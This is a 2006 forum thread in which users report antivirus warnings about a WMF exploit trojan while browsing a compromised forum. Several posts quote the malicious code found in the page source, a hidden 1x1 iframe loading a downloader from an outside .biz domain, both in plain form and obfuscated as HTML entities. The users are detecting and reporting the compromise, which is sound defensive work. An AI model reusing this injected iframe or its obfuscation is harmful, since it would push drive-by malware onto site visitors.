RaisinCain Posted July 8, 2006 Share Posted July 8, 2006 Went to forums to post items for sale, clicked submit new post & BAM! NOD32 is going crazy saying that a trojan is trying to d/l through http. WTF? Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 Any page that I browse to on the forums I get the following message from SAV: Scan type: Auto-Protect Scan Event: Threat Found! Threat: Downloader File: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62\xpladv543[1].wmf Location: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62 Computer: JEDIMARK User: Mark Action taken: Clean failed : Quarantine failed : Access denied Date found: 08 July 2006 09:55:36 (Please use small sizes for your images - Aaron) I've scanned my computer and found nothing and it doesn't happen on any other websites? Link to comment Share on other sites More sharing options...
jamend Posted July 8, 2006 Share Posted July 8, 2006 I'm getting this too. A lot of unpatched people are going to get hacked (edit: the WMF exploit was patched post-SP2). Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 Same here: https://www.neowin.net/forum/index.php?show...view=getnewpost Link to comment Share on other sites More sharing options...
Ytterbium Posted July 8, 2006 Share Posted July 8, 2006 Me too, NOD is going nuts Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 When browsing neowin forums, every page i load says it in infected with Exploit.WMF trojan SFLKSFNJ! Connects to site zchxsikpgz.biz only happens at this forum, no other locations Link to comment Share on other sites More sharing options...
Mx Posted July 8, 2006 Share Posted July 8, 2006 Same here too. Link to comment Share on other sites More sharing options...
Rudy Posted July 8, 2006 Share Posted July 8, 2006 nothing here....points to sig :D Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 same here, big issues.. just posted about it, refreshed and seen this one set your browser to higfh security temporary to stop it, just means most scripts wont work Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 Place zchxsikpgz.biz in your restricted sites in IE. Link to comment Share on other sites More sharing options...
Lowdar Posted July 8, 2006 Share Posted July 8, 2006 I'm in Firefox now, but when I was viewing Neowin in Internet Explorer seven different trojans appeared. :p Link to comment Share on other sites More sharing options...
Ranta Posted July 8, 2006 Share Posted July 8, 2006 McAfee is going crazy, something is definately wrong with neowin. Link to comment Share on other sites More sharing options...
chavo Posted July 8, 2006 Share Posted July 8, 2006 No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06. Link to comment Share on other sites More sharing options...
accesser Posted July 8, 2006 Share Posted July 8, 2006 Yeah I'm getting a pop-up like the ones you get to type text into a site Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 Anyone notify a MOD? Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 (edited) THIS IS IN THE SOURCE NEAR TOP <iframe src="https://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe> but is hidden behind other char's directly under <body> Edited July 8, 2006 by iascoot Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06. It won't affect Linux only Windows users using IE. Link to comment Share on other sites More sharing options...
da13ro Posted July 8, 2006 Share Posted July 8, 2006 Yes, if anyone has contact with a Mod or someone higher, i think the site needs to go into maintnance. Nice spot guys (im on FF) Link to comment Share on other sites More sharing options...
iascoot Posted July 8, 2006 Share Posted July 8, 2006 i PM'ed REDMARK twice but no response, i posted another post about this in forum issues and it got deleted but this one stayed so SOMEONE knows... Link to comment Share on other sites More sharing options...
84Mark Posted July 8, 2006 Share Posted July 8, 2006 I was going to PM Redmak but then I noticed he was viewing the topic already so I'm sure it will be sorted soon... Link to comment Share on other sites More sharing options...
Rudy Posted July 8, 2006 Share Posted July 8, 2006 It won't affect Linux only Windows users using IE. he prolly just was being a smartass like i was in my post Link to comment Share on other sites More sharing options...
RaisinCain Posted July 8, 2006 Author Share Posted July 8, 2006 Check this out. Link to comment Share on other sites More sharing options...
Japlabot Posted July 8, 2006 Share Posted July 8, 2006 (edited) <iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1></iframe> When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it. Edited July 8, 2006 by Quick Reply Link to comment Share on other sites More sharing options...
John Veteran Posted July 8, 2006 Veteran Share Posted July 8, 2006 Once that IFRAME is removed, everything should be fine. But how was the forum hacked in the first place??? Link to comment Share on other sites More sharing options...
Redmak Administrators Posted July 8, 2006 Administrators Share Posted July 8, 2006 Can anyone post a selection of the source because I don't see it Link to comment Share on other sites More sharing options...
Recommended Posts